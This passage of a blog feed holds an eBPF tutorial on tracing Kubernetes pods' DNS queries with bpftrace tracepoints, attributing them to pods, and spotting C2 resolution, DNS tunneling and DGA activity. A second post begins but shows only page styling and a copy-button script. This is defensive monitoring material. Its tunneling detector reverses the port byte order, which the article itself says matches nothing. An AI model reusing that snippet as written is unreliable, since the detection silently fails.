})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 11</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <strong>DNS Observability</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2392" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png" alt="eBPF DNS Kernel Observability — kernel-level DNS event capture without touching application code" class="wp-image-2120" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png 2392w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-280x300.png 280w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-957x1024.png 957w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-768x822.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1435x1536.png 1435w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1913x2048.png 1913w" sizes="(max-width: 2392px) 100vw, 2392px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF attaches to syscall tracepoints on the path DNS queries take through the kernel — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping<br />
  <em>(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)</em></li>
<li>CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned</li>
<li>A compromised workload&#8217;s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve</li>
<li>The DNS syscall path in Linux goes: application calls <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel network stack → UDP packet to CoreDNS resolver</li>
<li>You hook the <code class="" data-line="">sendto</code> tracepoint to catch the query leaving the pod and the <code class="" data-line="">recvfrom</code> tracepoint to catch the response arriving</li>
<li>Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself</li>
</ul>
<hr />
<p>EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags &#8220;unexpected DNS queries&#8221; — it can see the traffic on the wire, but it can&#8217;t tell you which process inside the pod sent it without restarting the pod or deploying an agent into it.</p>
<h2 id="quick-check-what-dns-traffic-is-leaving-your-pods-right-now">Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?</h2>
<p>Without installing anything, you can see DNS queries crossing any node in under 30 seconds:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
# The interval probe ends the trace after 30 seconds.
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    // sin_port is in network byte order: byte 2 is the high byte, byte 3 the low byte
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS query (UDP sendto)\n&quot;, comm, pid);
    }
}
interval:s:30 { exit(); }
&#039;
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
</code></pre>
<pre><code class="" data-line=""># How many DNS queries per process in the last 30 seconds?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    // sin_port is in network byte order: byte 2 is the high byte, byte 3 the low byte
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
&#039;
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one
</code></pre>
<blockquote>
<p><strong>On EKS or GKE managed nodes:</strong> You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The bpftrace program runs on the host kernel and sees all pods&#8217; DNS queries. GKE Autopilot restricts privileged pods — use GKE&#8217;s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).</p>
</blockquote>
<hr />
<p>A security scan flagged unexpected DNS queries from <code class="" data-line="">payment-svc</code> in the production namespace. The query domains didn&#8217;t match anything in the service&#8217;s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod&#8217;s IP — but couldn&#8217;t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod&#8217;s DNS logs.</p>
<p>The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.</p>
<p>I ran bpftrace with a <code class="" data-line="">recvfrom</code> hook to see which processes were receiving data — and therefore which PIDs were candidates for the DNS responses coming back into the pod:</p>
<pre><code class="" data-line=""># Print every successful recvfrom() with the receiving process; stops after 60 seconds
bpftrace -e &#039;
tracepoint:syscalls:sys_exit_recvfrom {
    // syscall exit tracepoints expose the return value as args-&gt;ret;
    // the retval builtin is not available in tracepoint probes
    if (args-&gt;ret &gt; 0) {
        printf(&quot;%-20s PID %-6d received %d bytes (possible DNS response)\n&quot;,
               comm, pid, args-&gt;ret);
    }
}
interval:s:60 { exit(); }
&#039;
</code></pre>
<p>Then cross-referenced the PIDs to container processes via <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code>. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.</p>
<p>No restart. No sidecar deployment. Found in under two minutes.</p>
<hr />
<h2 id="why-coredns-metrics-dont-give-you-this">Why CoreDNS Metrics Don&#8217;t Give You This</h2>
<p>CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:<br />
&#8211; Total queries per second across the cluster<br />
&#8211; Query latency histograms<br />
&#8211; Error rates (NXDOMAIN, SERVFAIL)<br />
&#8211; Upstream forwarder health</p>
<p>What they don&#8217;t tell you:<br />
&#8211; Which specific pod sent a query to a specific domain<br />
&#8211; Which process inside that pod made the <code class="" data-line="">getaddrinfo()</code> call<br />
&#8211; Whether the query came from the main container or an injected sidecar<br />
&#8211; The timing relationship between a DNS query and the connection that followed it</p>
<p>CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod&#8217;s process issues the <code class="" data-line="">sendto()</code> syscall — before it leaves the node. The difference is attribution.</p>
<hr />
<h2 id="the-dns-syscall-path-in-linux">The DNS Syscall Path in Linux</h2>
<p>Understanding where the hook fires helps you reason about what you can observe:</p>
<pre><code class="" data-line="">Application code
    ↓
getaddrinfo(&quot;api.example.com&quot;) ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &amp;resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &amp;src_addr, &amp;src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">getaddrinfo</code></strong> — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the <code class="" data-line="">sendto</code> tracepoint.</p>
<p><strong><code class="" data-line="">tracepoint</code></strong> — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel&#8217;s stable interface. The <code class="" data-line="">syscalls:sys_enter_sendto</code> tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.</p>
</blockquote>
<hr />
<h2 id="reading-dns-queries-at-the-tracepoint">Reading DNS Queries at the Tracepoint</h2>
<p>The <code class="" data-line="">sendto</code> tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.</p>
<p>The DNS wire format for a query:</p>
<pre><code class="" data-line="">Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)
</code></pre>
<p>The QNAME is length-prefixed labels: <code class="" data-line="">\x03api\x07example\x03com\x00</code> for <code class="" data-line="">api.example.com</code>. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:</p>
<pre><code class="" data-line=""># Watch DNS queries from a specific process name — replace &quot;payment-svc&quot;
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto /comm == &quot;payment-svc&quot;/ {
    printf(&quot;PID %-6d sending %d bytes to DNS\n&quot;, pid, args-&gt;len);
}
&#039;
</code></pre>
<p>For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:</p>
<pre><code class="" data-line=""># Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process&quot;: {
    &quot;pod&quot;: {&quot;name&quot;: &quot;payment-svc-7d4b9f-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
    &quot;binary&quot;: &quot;/usr/bin/payment-service&quot;,
    &quot;pid&quot;: 11043
  },
  &quot;function_name&quot;: &quot;__sys_sendto&quot;,
  &quot;args&quot;: [
    {&quot;sock_arg&quot;: {&quot;family&quot;: &quot;AF_INET&quot;, &quot;protocol&quot;: &quot;UDP&quot;,
                  &quot;daddr&quot;: &quot;10.96.0.10&quot;, &quot;dport&quot;: 53}},
    {&quot;bytes_arg&quot;: &quot;&lt;DNS query for metrics.datadoghq.com&gt;&quot;}
  ]
}
</code></pre>
<p>Pod name, namespace, binary, PID, and the domain being queried — all from a kernel-level hook (here a kprobe on <code class="" data-line="">__sys_sendto</code>), no sidecar, no pod restart.</p>
<hr />
<h2 id="building-pod-level-dns-attribution-without-tetragon">Building Pod-Level DNS Attribution Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:</p>
<pre><code class="" data-line=""># Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath=&#039;{range .items[*]}{.metadata.uid}{&quot; &quot;}{.metadata.name}{&quot; &quot;}{.metadata.namespace}{&quot;\n&quot;}{end}&#039; \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production
</code></pre>
<p>That&#8217;s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.</p>
<hr />
<h2 id="detecting-anomalous-dns-what-to-watch-for">Detecting Anomalous DNS: What to Watch For</h2>
<p>DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.</p>
<p>Signals worth watching at the kernel DNS layer:</p>
<p><strong>Queries to non-cluster domains from unexpected processes</strong></p>
<pre><code class="" data-line=""># List every process that sends to port 53, for 60 seconds.
# This does not inspect the queried name: telling cluster names (.cluster.local)
# apart from non-cluster domains needs DNS payload parsing, e.g. via Tetragon.
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    // sin_port is in network byte order: byte 2 is the high byte, byte 3 the low byte
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS sendto\n&quot;, comm, pid);
    }
}
interval:s:60 { exit(); }
&#039;
</code></pre>
<p><strong>High-frequency DNS queries from a single process</strong> (DNS tunneling fingerprint)</p>
<pre><code class="" data-line=""># Processes making more than N DNS queries per second
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
&#039;
</code></pre>
<p>DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.</p>
<p><strong>Queries immediately followed by a connection</strong> (normal vs anomalous pattern)</p>
<p>Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>DNS payload parsing is not trivial in bpftrace.</strong> Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with <code class="" data-line="">buf()</code>, but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.</p>
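<p><strong><code class="" data-line="">sendto</code> fires for all UDP, not just DNS.</strong> Filter on the destination port. The destination address structure is at <code class="" data-line="">args-&gt;addr</code> — port is in network byte order (big-endian) at bytes 2–3 of the <code class="" data-line="">sockaddr_in</code> structure, so the port is byte 2 × 256 + byte 3. Combining the two bytes in the opposite order yields 13568 for port 53, and the filter silently matches nothing. The examples filter on port 53; adjust the constant if you&#8217;re on a cluster that uses a non-standard DNS port. Also note that <code class="" data-line="">args-&gt;addr</code> is NULL when the socket was <code class="" data-line="">connect()</code>ed before sending — glibc&#8217;s resolver does this, and may use <code class="" data-line="">sendmmsg()</code> when it sends the A and AAAA queries together — so an address-based port filter only sees senders that pass an explicit destination.</p>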
<p><strong>CoreDNS pods will appear in your DNS query trace — that&#8217;s expected.</strong> CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.</p>
<p><strong>DNS over TCP is a separate code path.</strong> Most DNS queries are UDP. Large responses (&gt;512 bytes) or DNSSEC responses may trigger TCP fallback. The <code class="" data-line="">sendto</code> tracepoint catches UDP; for TCP DNS, you&#8217;d need <code class="" data-line="">tcp_sendmsg</code> with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.</p>
<p><strong>Caching means not every <code class="" data-line="">getaddrinfo()</code> generates a DNS query.</strong> glibc&#8217;s stub resolver does not cache answers itself, but a cache in front of it often does: <code class="" data-line="">nscd</code> where it is running, or an in-process cache in the application runtime (the JVM caches lookups, for example, and never reaches the resolver on a hit). With such a cache, a service that calls <code class="" data-line="">getaddrinfo(&quot;api.example.com&quot;)</code> every 100ms may only generate a DNS query every 30 seconds (the TTL). If you&#8217;re looking for which pods are resolving a domain and see only occasional tracepoint hits, that&#8217;s expected — it&#8217;s the cache miss rate, not the access rate.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>All DNS queries on a node</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }&#039;</code></td>
</tr>
<tr>
<td>DNS query count per process</td>
<td><code class="" data-line="">bpftrace -e &#039;... { @[comm] = count(); }&#039;</code></td>
</tr>
<tr>
<td>DNS queries from a specific process</td>
<td><code class="" data-line="">bpftrace -e &#039;... /comm == &quot;my-svc&quot;/ { ... }&#039;</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID → <code class="" data-line="">kubectl get pods</code></td>
</tr>
<tr>
<td>DNS events with domain names (Tetragon)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>DNS policy violations (Cilium)</td>
<td><code class="" data-line="">hubble observe --verdict DROPPED --protocol DNS</code></td>
</tr>
<tr>
<td>CoreDNS query logs</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l k8s-app=kube-dns</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>DNS signal</th>
<th>What it indicates</th>
</tr>
</thead>
<tbody>
<tr>
<td>New domain, immediate TCP connect</td>
<td>Possible C2 resolution</td>
</tr>
<tr>
<td>50+ queries/second from one PID</td>
<td>DNS tunneling candidate</td>
</tr>
<tr>
<td>Query to non-cluster domain from batch job</td>
<td>Unusual — investigate</td>
</tr>
<tr>
<td>NXDOMAIN responses at high rate</td>
<td>Misconfiguration or DGA</td>
</tr>
<tr>
<td>Queries from PID not matching any known binary</td>
<td>Injected process</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF uses the <code class="" data-line="">sendto</code> tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar</li>
<li>CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives</li>
<li>The DNS syscall path goes: <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the <code class="" data-line="">sendto()</code> boundary</li>
<li>A compromised workload&#8217;s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log</li>
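<li>glibc itself does not cache resolved names, but <code class="" data-line="">nscd</code> or an application-level cache can, so the tracepoint hit rate may reflect cache misses rather than the <code class="" data-line="">getaddrinfo()</code> call rate — account for this when baselining</li>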
<li>Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.</p>
<p>LSM hooks and Tetragon&#8217;s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no &#8220;detect and respond&#8221; window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.</p>
<p><em>Next: <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon — when the kernel says no</a></em></p>
<p>Get EP12 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&#038;title=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" data-a2a-url="https://linuxcent.com/ebpf-dns-observability-kubernetes/" data-a2a-title="DNS at the Kernel Level — What Your Pods Are Actually Resolving"></a></p><p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-dns-observability-kubernetes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1840</post-id>	</item>
		<item>
		<title>Broken Access Control in AWS: From Misconfigured S3 to Admin</title>
		<link>https://linuxcent.com/broken-access-control-aws-cloud/</link>
					<comments>https://linuxcent.com/broken-access-control-aws-cloud/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 04 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Broken Access Control]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[S3]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1852</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Broken access control is OWASP A01 because it is the most common cloud failure. How IAM wildcards, public S3 buckets, and overpermissioned roles create admin-level exposure.</p>
<p>The post <a href="https://linuxcent.com/broken-access-control-aws-cloud/">Broken Access Control in AWS: From Misconfigured S3 to Admin</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned badge and copy button */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code inside pre inherits the dark panel instead */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left border colour per language family; data-lang is set on the pre by the script that follows */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: hidden until the block is hovered or the button itself has keyboard focus */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn,.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative only, so it never intercepts pointer events */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Run at most once per page, even if this script is included more than once.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Text to copy: the code element's text when there is one; otherwise the pre's own
  // text with the injected copy button / language badge stripped, so the button label
  // is never copied along with the snippet.
  function snippetText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return clone.textContent;
  }
  // Decorate every pre: data-lang + badge when a language-xxx class exists, plus a Copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=snippetText(pre,code);
        // The async Clipboard API only exists in secure contexts; otherwise use the execCommand fallback.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
